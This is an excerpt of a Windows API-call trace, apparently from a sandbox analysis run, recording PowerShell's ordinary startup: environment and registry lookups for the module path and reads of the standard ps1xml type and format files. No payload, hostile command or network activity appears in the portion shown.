	[0153.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.763] CoTaskMemFree (pv=0x383d20) 
	[0153.768] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.768] CoTaskMemFree (pv=0x383d20) 
	[0153.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0153.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0153.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0153.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0153.811] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.811] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0153.813] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac30
	[0153.813] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96ac30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0153.814] CoTaskMemFree (pv=0x1b96ac30) 
	[0153.814] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d998 | out: phkResult=0x12d998*=0x324) returned 0x0
	[0153.814] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d91c, lpData=0x0, lpcbData=0x12d918*=0x0 | out: lpType=0x12d91c*=0x2, lpData=0x0, lpcbData=0x12d918*=0x6c) returned 0x0
	[0153.814] CoTaskMemAlloc (cb=0x70) returned 0x369150
	[0153.814] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d8ec, lpData=0x369150, lpcbData=0x12d8e8*=0x6c | out: lpType=0x12d8ec*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d8e8*=0x6c) returned 0x0
	[0153.814] CoTaskMemFree (pv=0x369150) 
	[0153.814] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac30
	[0153.814] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b96ac30, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0153.814] CoTaskMemFree (pv=0x1b96ac30) 
	[0153.814] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac30
	[0153.814] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96ac30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0153.814] CoTaskMemFree (pv=0x1b96ac30) 
	[0153.825] RegCloseKey (hKey=0x324) returned 0x0
	[0153.825] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac30
	[0153.825] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96ac30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0153.825] CoTaskMemFree (pv=0x1b96ac30) 
	[0153.825] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d998 | out: phkResult=0x12d998*=0x324) returned 0x0
	[0153.825] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d91c, lpData=0x0, lpcbData=0x12d918*=0x0 | out: lpType=0x12d91c*=0x0, lpData=0x0, lpcbData=0x12d918*=0x0) returned 0x2
	[0153.826] RegCloseKey (hKey=0x324) returned 0x0
	[0153.830] CoTaskMemAlloc (cb=0x20c) returned 0x1b965dd0
	[0153.830] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b965dd0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0153.831] CoTaskMemFree (pv=0x1b965dd0) 
	[0153.831] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d520, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0153.831] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0153.840] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.840] CoTaskMemFree (pv=0x383d20) 
	[0153.842] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.842] CoTaskMemFree (pv=0x383d20) 
	[0153.854] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.854] CoTaskMemFree (pv=0x383d20) 
	[0153.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d788 | out: phkResult=0x12d788*=0x32c) returned 0x0
	[0153.867] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x12d79c, lpData=0x0, lpcbData=0x12d798*=0x0 | out: lpType=0x12d79c*=0x1, lpData=0x0, lpcbData=0x12d798*=0x74) returned 0x0
	[0153.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0153.870] SetErrorMode (uMode=0x1) returned 0x1
	[0153.871] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d660 | out: lpFileInformation=0x12d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0153.871] SetErrorMode (uMode=0x1) returned 0x1
	[0153.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0153.874] SetErrorMode (uMode=0x1) returned 0x1
	[0153.874] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d660 | out: lpFileInformation=0x12d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0153.874] SetErrorMode (uMode=0x1) returned 0x1
	[0153.876] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.880] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0153.904] SetErrorMode (uMode=0x1) returned 0x1
	[0153.905] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0153.906] GetFileType (hFile=0x330) returned 0x1
	[0153.906] SetErrorMode (uMode=0x1) returned 0x1
	[0153.906] GetFileType (hFile=0x330) returned 0x1
	[0153.913] ReadFile (in: hFile=0x330, lpBuffer=0x302bfb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d598, lpOverlapped=0x0 | out: lpBuffer=0x302bfb0*, lpNumberOfBytesRead=0x12d598*=0x1000, lpOverlapped=0x0) returned 1
	[0153.916] ReadFile (in: hFile=0x330, lpBuffer=0x302bfb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d598, lpOverlapped=0x0 | out: lpBuffer=0x302bfb0*, lpNumberOfBytesRead=0x12d598*=0x1000, lpOverlapped=0x0) returned 1
	[0153.917] ReadFile (in: hFile=0x330, lpBuffer=0x302bfb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d598, lpOverlapped=0x0 | out: lpBuffer=0x302bfb0*, lpNumberOfBytesRead=0x12d598*=0x1000, lpOverlapped=0x0) returned 1
	[0153.917] ReadFile (in: hFile=0x330, lpBuffer=0x302bfb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d598, lpOverlapped=0x0 | out: lpBuffer=0x302bfb0*, lpNumberOfBytesRead=0x12d598*=0xcf3, lpOverlapped=0x0) returned 1
	[0153.918] ReadFile (in: hFile=0x330, lpBuffer=0x302b40b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d598, lpOverlapped=0x0 | out: lpBuffer=0x302b40b*, lpNumberOfBytesRead=0x12d598*=0x0, lpOverlapped=0x0) returned 1
	[0153.918] ReadFile (in: hFile=0x330, lpBuffer=0x302bfb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d598, lpOverlapped=0x0 | out: lpBuffer=0x302bfb0*, lpNumberOfBytesRead=0x12d598*=0x0, lpOverlapped=0x0) returned 1
	[0153.920] CloseHandle (hObject=0x330) returned 1
	[0153.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0153.924] SetErrorMode (uMode=0x1) returned 0x1
	[0153.924] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d510 | out: lpFileInformation=0x12d510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0153.924] SetErrorMode (uMode=0x1) returned 0x1
	[0153.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0153.928] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5f8 | out: phkResult=0x12d5f8*=0x330) returned 0x0
	[0153.928] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d57c, lpData=0x0, lpcbData=0x12d578*=0x0 | out: lpType=0x12d57c*=0x1, lpData=0x0, lpcbData=0x12d578*=0x56) returned 0x0
	[0153.928] CoTaskMemAlloc (cb=0x5a) returned 0x1b9645f0
	[0153.928] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d54c, lpData=0x1b9645f0, lpcbData=0x12d548*=0x56 | out: lpType=0x12d54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d548*=0x56) returned 0x0
	[0153.979] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.539] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.514] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.136] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.137] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.551] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.567] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.568] VirtualQuery (in: lpAddress=0x12c2e0, lpBuffer=0x12d1a0, dwLength=0x30 | out: lpBuffer=0x12d1a0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.574] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0159.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.574] CoTaskMemFree (pv=0x383d20) 
	[0159.792] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d798 | out: phkResult=0x12d798*=0x308) returned 0x0
	[0159.793] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x12d7ac, lpData=0x0, lpcbData=0x12d7a8*=0x0 | out: lpType=0x12d7ac*=0x1, lpData=0x0, lpcbData=0x12d7a8*=0x74) returned 0x0
	[0159.793] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x12d71c, lpData=0x0, lpcbData=0x12d718*=0x0 | out: lpType=0x12d71c*=0x1, lpData=0x0, lpcbData=0x12d718*=0x74) returned 0x0
	[0159.793] CoTaskMemAlloc (cb=0x78) returned 0x369150
	[0159.793] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x12d6ec, lpData=0x369150, lpcbData=0x12d6e8*=0x74 | out: lpType=0x12d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d6e8*=0x74) returned 0x0
	[0160.114] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0160.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.126] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0160.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.126] CoTaskMemFree (pv=0x383d20) 
	[0160.128] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0160.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.128] CoTaskMemFree (pv=0x383d20) 
	[0160.130] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0160.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.130] CoTaskMemFree (pv=0x383d20) 
	[0160.188] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0160.189] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0160.195] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0160.200] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0160.203] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0160.205] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.208] ReadFile (in: hFile=0x30c, lpBuffer=0x359ea3a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359ea3a*, lpNumberOfBytesRead=0x12d308*=0x0, lpOverlapped=0x0) returned 1
	[0160.211] ReadFile (in: hFile=0x30c, lpBuffer=0x359f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x359f4f0*, lpNumberOfBytesRead=0x12d308*=0x0, lpOverlapped=0x0) returned 1
	[0160.214] CloseHandle (hObject=0x30c) returned 1
	[0160.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.372] SetErrorMode (uMode=0x1) returned 0x1
	[0160.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d2b0 | out: lpFileInformation=0x12d2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.789] SetErrorMode (uMode=0x1) returned 0x1
	[0160.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.796] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x9f4094f3, Data2=0x5f0f, Data3=0x4392, Data4=([0]=0xb8, [1]=0xd9, [2]=0x60, [3]=0xa6, [4]=0xdb, [5]=0x2b, [6]=0x96, [7]=0x6d))) returned 0x0
	[0160.809] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xf7af4948, Data2=0xd374, Data3=0x4d8c, Data4=([0]=0x82, [1]=0x84, [2]=0xd9, [3]=0x56, [4]=0x8a, [5]=0x8, [6]=0x56, [7]=0xd9))) returned 0x0
	[0160.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.811] SetErrorMode (uMode=0x1) returned 0x1
	[0160.811] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0161.027] GetFileType (hFile=0x30c) returned 0x1
	[0161.027] SetErrorMode (uMode=0x1) returned 0x1
	[0161.027] GetFileType (hFile=0x30c) returned 0x1
	[0161.027] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0161.078] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0161.290] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0161.699] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0161.930] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0161.932] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0xfb2, lpOverlapped=0x0) returned 1
	[0161.932] ReadFile (in: hFile=0x30c, lpBuffer=0x35c9772, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35c9772*, lpNumberOfBytesRead=0x12d308*=0x0, lpOverlapped=0x0) returned 1
	[0161.932] ReadFile (in: hFile=0x30c, lpBuffer=0x35ca058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x35ca058*, lpNumberOfBytesRead=0x12d308*=0x0, lpOverlapped=0x0) returned 1
	[0161.932] CloseHandle (hObject=0x30c) returned 1
	[0163.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0163.661] SetErrorMode (uMode=0x1) returned 0x1
